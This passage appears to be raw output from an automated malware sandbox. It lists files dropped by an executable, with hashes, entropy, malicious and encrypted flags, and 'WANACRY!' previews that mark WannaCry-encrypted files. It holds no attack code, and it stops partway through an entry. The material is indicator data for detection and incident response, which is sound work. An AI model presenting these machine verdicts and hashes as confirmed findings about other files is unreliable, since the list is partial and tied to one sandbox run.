                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.998670002128212
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.9982652359642055
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998126600039099
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998502424640496
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):364408
                                Entropy (8bit):7.9995417060615415
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246312
                                Entropy (8bit):7.999330414347671
                                Encrypted:true
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):273704
                                Entropy (8bit):7.999288419867323
                                Encrypted:true
                                SSDEEP:6144:b3NuIFLpqwg/2zKyIc/Czuf7hZ9ieSv22oPvdZBSiN81uY3U5Se:boIpp74yCzujb9ile2oPv1Si+1uY3de
                                MD5:89E3520491ED4A58058B49AC3FCDC7B2
                                SHA1:E9597A0ECC49369F865E57CDBA9801D8749F7782
                                SHA-256:B79E102C31D31032115DA799E73EF2047C97088E341ED4AADA3E9D2400F02437
                                SHA-512:C219B4B24B23073728CB8E53DAAFDC078A13DD47692A92E7984BB7B7775AB027E537A1C4C207E120027A823E31430EF7465801A2687305F17D5DBC88FCCB36A5
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246824
                                Entropy (8bit):7.999227852254764
                                Encrypted:true
                                SSDEEP:6144:6k1CHEezLw42KVDPP1OsRLQDYYdggEVGSkR3gZsBq/n7sc5EHOr:6kGTXx0YLwYaEdkR3gSBWsc5rr
                                MD5:8876F29EAA76A41DD11ACD91D5BBBD15
                                SHA1:06050170100D27F6CCBC84CDE5E820E8D95554CE
                                SHA-256:74D9E3364080F41F16AA2157292FCF81AD2103585007976E311DB8200B6EF852
                                SHA-512:429A57C5FF4536B88A911FE901EBE8453D281387DC0310087611FC98E64061E71D919917D6225AD99C440D921D9670252015562DBCC6750464E53316CA6B8F08
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.866416685064381
                                Encrypted:false
                                SSDEEP:48:bkj2PbGaQUjDYtnZtyd8Uv9AGeDSxX1r4O:oj2zG1Zt6AW
                                MD5:DBBA3A204CC8F0CFFE48D0B6528C19D0
                                SHA1:5C4C6A1A8B2A0B269EB26C12B03381F9A042F430
                                SHA-256:D5AC3046D3540989CC736690F8009DC58731B03F818D43C06A55A413BEDF0407
                                SHA-512:46AE0BEF62B9597EF86B356B46FE0D8DE4B7374FF9EF97B445E2DDF18D62F19540CC847938E0A1D60765B7B66B38D4D848088B49F1288C2E5DC62B8E511FD2EC
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.86546786440072
                                Encrypted:false
                                SSDEEP:48:bkXw2+2+91TQtBOnuA530aMnTJcA8jyeORS5ed:oXQP1TXnP530nnTJGjmRSo
                                MD5:31D64C64338BE87DC1980EDAA15B1F99
                                SHA1:476B8EE8FAEF0A9A754FDC8EAC1AFED258F93635
                                SHA-256:7141280735032C220DB3C05D2F22FD87063A051512C169FDC4D8BF8642E9E594
                                SHA-512:398EC9D2AFCE09DC105479F128116AE2A1124CCF30A72801116712181B8929EF60168F6DC415322E59D5000F686B0D8FBC0248B80740F974C7E4B71CC6DF422C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.8593253453376954
                                Encrypted:false
                                SSDEEP:48:bkDmXL6wAau+Ev7c9RUlRpAeDcbLsv7sLY:oi+wAas74OTfe07l
                                MD5:27B1086077264B3AE5B151B7AEF0F10E
                                SHA1:442D676F0C000A45D56303D083E7BB1644A55412
                                SHA-256:20460D552D97A0D4308CD901AD2EE59A1769182598BFC5F722C599B8B5746224
                                SHA-512:2C3021D60976B401F2870066654ACCE22DCA8658B5B37578CDD967E284116842DCB3D5039E6AC9F2BEABD41CCDE4660F5DB4E78F10B4871C013A930AF7CF37E5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1880
                                Entropy (8bit):7.902265530217827
                                Encrypted:false
                                SSDEEP:48:bkdKGekHg3+6xIOWpjG/KE2Oa6c3sHHOS:odKGekA3+6xhajpoaHG
                                MD5:CFAF3A19761F851518D08952B07F6521
                                SHA1:81362181CA1AD87C33C143C58E457B8070149B0F
                                SHA-256:A27E6C54B0869131554352C8F0E4E42A04A9AE4A6E814CBC8266485A1735A573
                                SHA-512:8112F0F3756F7F6F192C9F767E49B77BB4983539411C8791B421325C256468149C8DA0A7973D799CD9889A7707E1F60ED739F811B33FB63F035CB99027EE7955
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1944
                                Entropy (8bit):7.914587777961285
                                Encrypted:false
                                SSDEEP:48:bkuv0FAzJCdgtW34WPi55KzadPbjvzzzqfNCwo+oqC6adXx+51K:oQJcgAIjAzWP/zqfHob6aXP
                                MD5:49D69851B998724180F2550B91FC2C31
                                SHA1:8FFF4D3EF100421860563DF636CF1A28B9A2E6F4
                                SHA-256:BB34AB8B340C5F608400D3221D74F472DAAEBF7400B733687EDC39BB034811DF
                                SHA-512:2A6CC5E86AF66B8884013A65E8578CCF6C89035BC48CE2028249FB9448368244D167579B386940AE7461771EDF6F4A31438BE1272888E2CB6256A81A3AF00B03
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.865898889140843
                                Encrypted:false
                                SSDEEP:48:bk9hvMolScUd71q/7KPW7tNgXW4Xa4soum3Ncc9+:ovvMooD7mOP0NyzK4s6cp
                                MD5:F5A334730C560A18702C801D99E6E595
                                SHA1:9A0F143E22F992E039B5FCFA9CB8B13A1547B487
                                SHA-256:30F97934AD4DC785A30F645C43FAD89631712C73422513CCD75C153B4158763A
                                SHA-512:D44C49DDD3299354B8F4E1626BA49FE70425C724E0C1C7C70C2F97A2807F9A1364CB8904EA810B7A191C3AF192C61954E124FF97499978F822E777689997F2B4
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):352008
                                Entropy (8bit):7.9993808630216225
                                Encrypted:true
                                SSDEEP:6144:TTy9MfdlQJiF25R3Tp1Ag0UYce7YPGjimfCYdXmJwE1SSlB2rkCKKtoDCy:TT8MFkiF25nAU3gsuZj211PlcrwAO
                                MD5:815F95E5EB3F533A70FEA15F2BCC6B48
                                SHA1:5D46518F396A4018476C6A943F526A1E2D42EEC9
                                SHA-256:693C29D7877F7EC4B1229127260465FB738A1CF6427EE96F12B49776575F7136
                                SHA-512:E854D870C2CCFD0F9099E3621E109FD37D6A95009E96D87292584C1ED6BC0B97143399B19B420884CDD0B0E9A931D65FEEE027D72A6B0CBC7569EA1FCC1A5C67
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):243784
                                Entropy (8bit):7.999194677387297
                                Encrypted:true
                                SSDEEP:3072:aB0Hj5JoSXjYVWhQvC83CTwIL987q6pxL6IPV8Oyiz23yzKKv56upVzH2On0MAJI:FOXv0TwIpMq6nh/lh6QzLn0zJt0Q3m
                                MD5:ABA0733B2B79EE8B601A002350CD3988
                                SHA1:AB8C899ABF1EF874571FBB519845B4BF880FC05F
                                SHA-256:F2360EA81155A7680F460278D1FDF21E7E5F44503B6AD45BFEA2A28B14687259
                                SHA-512:6007CE8A7A8B5ACFC8A5C2A5BF84340F03CF6F07DE555832347ECEF341A6A3BCABE33CBA1B6237E6999ABAA6DF28E8A1C9691DB9A90A4EE9DDFC7AB9824BE7C5
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55320
                                Entropy (8bit):7.996226975058619
                                Encrypted:true
                                SSDEEP:1536:G1VTwyqTRFRDR8H+6q0Ow6KE6ogc7zt1pg:qTpaDRP6Em
                                MD5:51F5DE08B5EBB5E6DD6C52DA3ECA307D
                                SHA1:0806875482B183B74D4556A36395F34F740F0ECB
                                SHA-256:BC9C6D9A51F2FE2B26B32A9D3872431AAD84ABB73EE44174CE1B994D86C3D409
                                SHA-512:30573A30C40FD5D88ADF277F0AA9F152CFA8A5FC5C4A0372F835A44864CE8BBC801EBB2DC98530D51983893E72E1F76FB1F96B66E0D11ACA58D84887A6DC7C23
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.99326540145318
                                Encrypted:true
                                SSDEEP:384:CX7YeDiWcwGE4wi8Vwd+HgqiHm96/effSu4O3MKrJjD9PU1HFF7U3+hYW4xSdXCT:CoTHIwd+H57uWMyJjK93hYNSc
                                MD5:EC5A11F934EE3C506E344FA2583FED61
                                SHA1:6A7996655731E65ECA60F370CE64221708093BD7
                                SHA-256:DB5CE90812B5020945503B09B98FE323300218A0E2A7C04BFBCEF4D137E62CC8
                                SHA-512:17CF7D87936170CB773E331A68A12F35AD4913D622629CB9A81B4C38AC8223D844A177AE61C9660B2B89AC3C5E2956B6CF3F921B4DE85A3B9A458777C9046ABB
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):25192
                                Entropy (8bit):7.991684795454581
                                Encrypted:true
                                SSDEEP:768:NVErtMNuWIjRHCFLuSi/ZLUardvUPVAYf98JTt:NVMtCHIguSixBB0CAy
                                MD5:F56B3EB69A0931ECFBB4A63944C06D16
                                SHA1:F40283F9E53C66A46F8BF3861B42985F8BF2F274
                                SHA-256:692C568DE560CBA2FBF386918D03482AB68F8BAA3517B38E0A6FE97A900ABE80
                                SHA-512:64BCFCFEBBD62DA4AA9B9217825D35391AFB82C03288399849537567BDA6C728293319495250A295C2A05F907BFDA1958CEA7AB8A3FC4C5D8F5DC639DB0D4E54
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.994693055365256
                                Encrypted:true
                                SSDEEP:768:5MYM0FsCwu3MrGnPewdyKkySfqYM6LS7PaPbYUlbg2To:5PsCjmePbzS3M6LNA
                                MD5:662F34EBB1DDBE5FEBE8410ED9F73662
                                SHA1:70D2480FA291560DD6E8D2A7F01B68531017D7CF
                                SHA-256:D82FAB63D24811DDE7D2B419BD25037EB8380790EB6BC1313C2A408E1CA0068B
                                SHA-512:25EE210C7191167714751B8F00607D1FCADF90BA3EF3E66B3BA43CCCD35A7ECFB40F2B52C8AC04C7D1DE32DC93C57EC481EC9E9E2489038D6911BCF7899C6717
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995452270200452
                                Encrypted:true
                                SSDEEP:768:Gb0/TpumAlDTnLVyqouJY5/qN1Uxk3H5NzLzKtmtGg/z2/u:28dlCneH5/qQxAFL22K/u
                                MD5:286D154FEA55B0B5DCCF7ED31941AF51
                                SHA1:9D5F547EE531B193EE0DADBEDEE7C4D85436EAF7
                                SHA-256:C6F2D298E0D78974039DB775D076AB09EBEE7EC530EC76BFC10AD23BC788B7C6
                                SHA-512:731E20C4E24C0537AEF51EA55F1DC08A51CCA643CE1A8B607B436876789332A305D231093FF54B975E3613DF1EDC61E8B89D18EF55CD70E6B1F8C6C6885B6C75
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38040
                                Entropy (8bit):7.995283190461034
                                Encrypted:true
                                SSDEEP:768:weKVzjpD5WTEqTlNVilU+vhYfyMpDmO+8s0FEsjiibSB4L/psMJ9u:wZVz1D5EEqRNWvhYfBpqO+8soSJM7u
                                MD5:A876257E7834F3EAF7C38E30214D409B
                                SHA1:701965B61A9B43678C5A568270637CD73371BEF2
                                SHA-256:4C5F743EA3917D33739D9FA22C3364310473BAC0994237556D776D356D2CC8F9
                                SHA-512:07744EB1E1559629A690C9F3E5E6BAA83EB6BC160BEDE439437E0A2278836CD9FDCA7C8EA8158B17E57C4B09254695F280E0BF15317175E6B1E20E97D075EADD
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1426184
                                Entropy (8bit):7.99985256158353
                                Encrypted:true
                                SSDEEP:24576:lYUm6gESFXPxnNydZgREymbTtJr4j/tTg8+WC2T0jOuG40Fmz5ze/bOzSU95:lYUm6VuPxN8mREDDr4j//TdwjlL4mNUO
                                MD5:813F957D188BB9AEDB7B137D1644EEE8
                                SHA1:03645D02A41D20A35556D3314BF1034D0CF99751
                                SHA-256:A8B0ECB27F2D496729C53F31E73A68BBFF1900AD1927D593DC05CF9238B215B0
                                SHA-512:7C122B2FDEC7CC03F75D39D3ACA5766A04552C60B690888A21F1216644F80010ABBDA063DCC11112C29EB25CB33F2F4CD05D8BA682E1BB42BCE596EABB077CA8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):533032
                                Entropy (8bit):7.999659495897816
                                Encrypted:true
                                SSDEEP:12288:2yJwTAbdc+r0ZHgqe4zLVbaV3L0/nOLhNl3GRznk4:2yi+UgqtzLVeL0/O1Nka4
                                MD5:591B90F98D96219113149C2EFAB64AD6
                                SHA1:F774CE49278C2B1C1FE9CF02EECA8E7BDF0B071A
                                SHA-256:B5742BEA35E49904E26332B99DCCBC6D343A6723EE330DB8DCCB2757C2DCC44C
                                SHA-512:68DC2FFAC7A0BEE938BB0148A066190EE791AE83C40858B558B1731B371D65D23994251D76EA0FD58F57CBBE2CACCA97331DBAB776F2A8A47EE64B0C4FDD5E9C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41416
                                Entropy (8bit):7.994988468993542
                                Encrypted:true
                                SSDEEP:768:3cTOxNi806JWLbi8sLWGRgCijcC8ff0hVgpc3CKiVhwjoKsCufbTROdz8FLwNayA:3nxND06qkP2CocC830h2pcR0ZLfbTRS2
                                MD5:1A187A2B1774759C4DFD6D69AD9009A3
                                SHA1:8A8165EEEE7531423E987266CC2633D56A70B0A4
                                SHA-256:86EBDABA82281471758265080FF1575524FE3D205AE1F87C7DB376F04E1D3F4B
                                SHA-512:8E072025B08128A9273B5963EB2F5EAA2F92D4422FB3388FD2F3E5E63CD865D7E3F33A8597159C12FACA9A5A540FD12B3E4831764433B01846A34FE61724B4ED
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104008
                                Entropy (8bit):7.997942678580585
                                Encrypted:true
                                SSDEEP:3072:GL3S8nOckclagXrWUx0hXPx0lA3/rp9ige:m3kclMUx09Px0aPTg
                                MD5:B305178CA17DD882E9DB6E7CAAE731EC
                                SHA1:D28177762AD36B122E171C948E2F8CD15CA327F3
                                SHA-256:192088425ED9EA531BED8FEC82CAD9D89766E099DF63122745638D3A7BF15936
                                SHA-512:F9A78EF68E24DA9F393A661B0BC6F78803D168A5DD759F8D6BEF6B3D400C07E9D1B56C2A4334CA10B780E07023CC99FFDFDBC4C5B5F46EDE26DE9E9F13962FBD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999115649730841
                                Encrypted:true
                                SSDEEP:3072:In1xZ+e3Ktq8vmFtaOxEhC8dncApiqTVCjeS8vGa9xVTwOIMVrMx9VC69yogSI:I78+FtaOxyvNAqeetLrV8YG/UxT
                                MD5:0C806391C781CA24108D633DA53AD724
                                SHA1:1753FDA421478049A158F3169D61F267DA41272E
                                SHA-256:E1A5B3A39874138919F895AD7A8ABA7C8097C4B87A230EF55AFC461CDC7DD2F8
                                SHA-512:FBD8AF3B085844EE51551DA034A6CB7D8BF1E51715D243D337049209BD251F103C01CFA3D12F3E82A61133E11E570C65569D6C0FAB6E7D6DF7D5B07E01F93397
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):214008
                                Entropy (8bit):7.999118288275091
                                Encrypted:true
                                SSDEEP:3072:OEL+8IrOKOX/zWDQm7Y8G6YVViHbVWe8tgLWk4emlKxHXhGGi7kI6iDCU8hy0nM3:vK/Vf7Y8G/VVCZWHNl9i3hp4DCBYCA
                                MD5:C491AD13994FFF8A13F7F72403CD0337
                                SHA1:42D496FD32D18218EAD6DD5D5CE19AC0FBC687A4
                                SHA-256:199085E90AB4AD3403089C7E6D7F4FAB9005098D587E1BD0DE04DB901A13B486
                                SHA-512:E54B5102FD343DB95D0056DBB5FB2B8D35D7DD321DEE852B7D2C69B1B54F3301619906D2D7936CFED95C19C52D3214EA69844BB81FCB4AEC30A5DBFCB6614A83
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):202120
                                Entropy (8bit):7.999126120005269
                                Encrypted:true
                                SSDEEP:6144:hCAApLJlOsCdO3WNB1xovqaPnpoq7byNcV1j6P5D778NQ:hFAlAObdnlmyV1j6NCQ
                                MD5:E8E2DB3E66C5218858E0F002DA4EA28E
                                SHA1:3E0235C1E79116012371460108BDCB4CE7406D01
                                SHA-256:A547D6B0DE1CDB319784F1AB0C16C7FAB7A20CF2A44CDED1FE1B5D972D4DB84E
                                SHA-512:6ED6C639F2A35E821CC76AA601C85CC89C5EC1C3CFA4810B848C30F8D308E77C9D65B269B0B6DE73403F121302A29383DA86D7DEF1B5ABE7AAC092658A2E8F10
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34536
                                Entropy (8bit):7.993831646181793
                                Encrypted:true
                                SSDEEP:768:399lNk5XUX/1l7iKC/wd1JQsqe90qmesYTlFU76mlP6e50Be:3nrk5DKSwnJfqeyj5KC/V50Be
                                MD5:A53D7DCA9829F68D76BDA2274AA058B7
                                SHA1:85A998F032BC98EAA1B2A3D9DD40BC40958CCAC2
                                SHA-256:920E373F07E017259533195050AA630B78C0610F5EC68DF1A5EA0921C50B6E01
                                SHA-512:12CC1AF3ABFB117ED499091574524F8663F7A255E43AC5286B0975A91F5E50B26F59388E637C0E83A6EEA6A084C00BA05BEB11610DA4EF312A28EA0035B33C87
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):227064
                                Entropy (8bit):7.999231559643118
                                Encrypted:true
                                SSDEEP:3072:WSYlNdXtAaEBvlFIZj3lO2V94sQFOwwTCnLVWTjkutnlGEzw8XV5Wz1SOXGEeWs/:WdXuBzGJQsQHnLQtlGpKV5YmP
                                MD5:040DEF7F2E02E0BA692E9817BDA476E6
                                SHA1:F701EEE53E361FBD9606E589A034859E48606299
                                SHA-256:7B4D767F21D1051B1798467E73F88CEFA10F8376848889F723C408B38709D801
                                SHA-512:F07ECC74BA571ABF128556777D22872E764E16BB8E86E1F04F6A90C3AD1D3F037663D090D272D2531C34D137F0EC0CCEDD0156D83006076F7755DAE090D450E4
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):53752
                                Entropy (8bit):7.996427760791523
                                Encrypted:true
                                SSDEEP:1536:NolrOnkcP0a94UigxECyMoPwo2L7xBGWtGUoOa:NoInkQ0a94UBlFoYL7xBvGUoOa
                                MD5:C3D8D45C59F92718948AC48CE1462847
                                SHA1:1C9E2AFD9C663596B9E4943D46C932779A14F9E2
                                SHA-256:A13D9CD068271FAED6F915C3A33CD0355679D90FDE0D2CEFF51B043B9C1D2D29
                                SHA-512:478EACABE6DD79F45E073AD13569F6914411811F4F66348C6A025396EAC6764DB686CA769F81C183BD3002B21041615B8A1BC83D765BD9EAABC4F58A79531F59
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8008
                                Entropy (8bit):7.978936479330439
                                Encrypted:false
                                SSDEEP:192:rcpj1mDlQEeAiOk2VnC0vkI6WLF1tSjCvo+v7xc8zh3h:rcpxMzxVnPdLF1tQwdcY
                                MD5:D5530D469E94DDC467FD6ACC992AAAC0
                                SHA1:8C4B2C6DAF2025C81EAC510DBE04A00A708C59AF
                                SHA-256:4AB86518B101DCCD16BB1149DC0582D2FE4540EF7F9FA633E0E7F69CD9E2C382
                                SHA-512:2C2994DA7D6B49CC21A6FF9ACC952ADD289155A4081CA21E274E24BC246DE9978A6F5D2352CDC57F95DA1BEAAD7F7343ED578DC917B6F6A328816BCA58F871A2
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):123256
                                Entropy (8bit):7.9986258075867225
                                Encrypted:true
                                SSDEEP:3072:j4Ke2RHIRO9jv2HECyEZYauidFP3vY2rw8Td+3UaQnImlIWSG3:s92RHI+jv5sYa5dFPvTrRd+3UamlIy
                                MD5:0804D533853E52F3A2E72FF8C089FF36
                                SHA1:FBFCB66951D0C7D4FF3718BB2ABA99C3BC09F1C6
                                SHA-256:B01B97660E09FF896699C7A27A83FA7B5279A2650ADAC28CB0839614FC59D2E2
                                SHA-512:273006BBD3BA1A03BF9937DE3097A6B9153B7B05DB75D95D377DB7EC8D9E75014F004843E96671CEEC400305EA91F026623D372FA7A78E1C369765813D0D4B27
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):95112
                                Entropy (8bit):7.9979534591976025
                                Encrypted:true
                                SSDEEP:1536:a72mqrOcGJ57W3aEPcqItHyiJZ17Y74mCAQVB33KmBBlzibaMYbe03yhA2AdKB:a7VYJG77W3aYnItHtnY74mCAQVB/B/HQ
                                MD5:36A47190952AC79378DCEE472F09C764
                                SHA1:C016349124073D3133EB7C5BB284451051437225
                                SHA-256:DDAEE76866D3C58319DD8E77D2B241037CACE6248D5E2BAB8B467AC56B34715F
                                SHA-512:A917A4D67776CB862BCF1D48333FED379FB99940B210D7A78A5F498ABAE6185262AF3525E1427F041BA70F33B3E3F72FC1FB60513C73786835A874F68F3717BF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6872
                                Entropy (8bit):7.9692803217288954
                                Encrypted:false
                                SSDEEP:96:oYesNuSjf1z1qeNhetFiKlO8PboU4btAkXPt1vEiwcXbM8NaA5WYjEicx1PUpbXE:FeJCf15qe6tFVOkin/ttzMlFicxRibyR
                                MD5:5C47455F71FA3AD318554AD436DF7549
                                SHA1:9C2FE23E9D90FE3FB37D29B540A0E4F71D74B944
                                SHA-256:BB626EBA6709B60F7B162276F4E90883004041123516D583068E5608D8F07B75
                                SHA-512:27EDEA493F89476F85DC9563795A6F52F99873E116AE76B5834F17F448B50E6AC5337666C48C1693782E7360615236D914E975738790D4EB7D130D319CE0D6EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):122040
                                Entropy (8bit):7.998424207686981
                                Encrypted:true
                                SSDEEP:3072:qWbhg24UMxFpe1qw6P9MPcxYKxKNAKT3JFDlFsVk:qymKMxHKaPxxWxJdP
                                MD5:6BA774B65C629551E5DD9C33E08C1EEA
                                SHA1:14403B578F13AB2914F1F8E4E74805C5344E5058
                                SHA-256:11BA652646E030BA916DE8BD353B0FADC8E9C9680E8E412E0431DA308D0FF8EC
                                SHA-512:F1F75CC5A7223598F69FB638022C9F694A89DEEBD397376471AF4F80B6A481F28480A033774B41F3DFB5D3BAC72DF1984150A65B179EFACE34594CCE6BBF8AE7
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):121496
                                Entropy (8bit):7.998474973271479
                                Encrypted:true
                                SSDEEP:3072:ENgyjQRx6VeyxNyu97GOm0CwpXiL86zRdO6obWIxbBRH:3Z6Ou9tm0CwE865IxbHH
                                MD5:BCA4C596D8AEF892DD8895BBE21405D2
                                SHA1:A7CC24AB590A497ACA4C9B85356885125B66B791
                                SHA-256:3D6D98927C2CB06B44402BCBBDBBDC741E2895A648D50E1BE9C2DB8F0F21BD13
                                SHA-512:156685066677563AC911D1FE5D364148FBB398AFF69D977D4D046E29562EC80656DEECECA4F81420AB249F46C0D33377C8DF7C2C2549ECF0CC3D7BC1D1006940
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):65784
                                Entropy (8bit):7.997033311270933
                                Encrypted:true
                                SSDEEP:1536:lYwd/2rusyR5hcWWuCndWw4Od31dTrDe1KUzPtVVcFLFbRLeRDrI:eI/2mu0CdWwndDeoUxVVgJbd2c
                                MD5:E00C37C800AE82394A726806CB313CF9
                                SHA1:F689FF82A909F823A348C790AAEABC88A16A3605
                                SHA-256:BD0861F21DA8E71E0AE954F17067EF03FE7ADB84D9250A4B7FCD0DB3268B6937
                                SHA-512:D2BCEFDE2239582BDF3E67A2725E625305617D4F2C075919B6183A9A330350D6057C0AF9ED5CC9BF645B2F632F7BE3E832B4013E1DCB2F83AEADEB96F5193AAB
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45800
                                Entropy (8bit):7.995902480623642
                                Encrypted:true
                                SSDEEP:768:rPLoNaRuP8pP1ePtpAEb5XVrIdZhcOUUQq71Dzgy36JusJ69gU2u9Wzm:rcNxKw0EdI7UvMWe6JZJ6WJu9Wy
                                MD5:D901C9AC2E794C4C59414FCFC2F6CF28
                                SHA1:88959F2966CC3C638D346F748B5BDC84BB8DA0B7
                                SHA-256:B31275BF3E09105102C389106055305D6A33C050AFBF2178ED698C2DBA4D8253
                                SHA-512:3009EAEAF3F3D2CC8EE5F717BBEAB3EC210A11F505916E2B96E82DF8D78E800AA916BE4A41D944A48CD89680ED268867EACC1FB38701C78855EC59408DBA001F
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):202536
                                Entropy (8bit):7.999033851806259
                                Encrypted:true
                                SSDEEP:6144:i/liHcaxCcz2GEl9YcU3wHHJAcNYI5lmSIA4:20cmC0c3npA2xzq
                                MD5:C43E894352B8B8BF96E384B64D3E3C10
                                SHA1:8CC3470DDF9DA8911D96C4DA6A154D5047E0406A
                                SHA-256:99C42BFC8C2A05A41417191376B2A3A2116B98C9887EF23BCBCF3011CB9A0308
                                SHA-512:89F6EACC9E92B7AC2FC226B36633DC222CBE3ABAA883E5F447E8581D7C9A7CF10983D85DA862B4505DD2BDAD4830CE37C905F18A57EBA6241DAA4CE758C962B8
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16200
                                Entropy (8bit):7.98716465787195
                                Encrypted:false
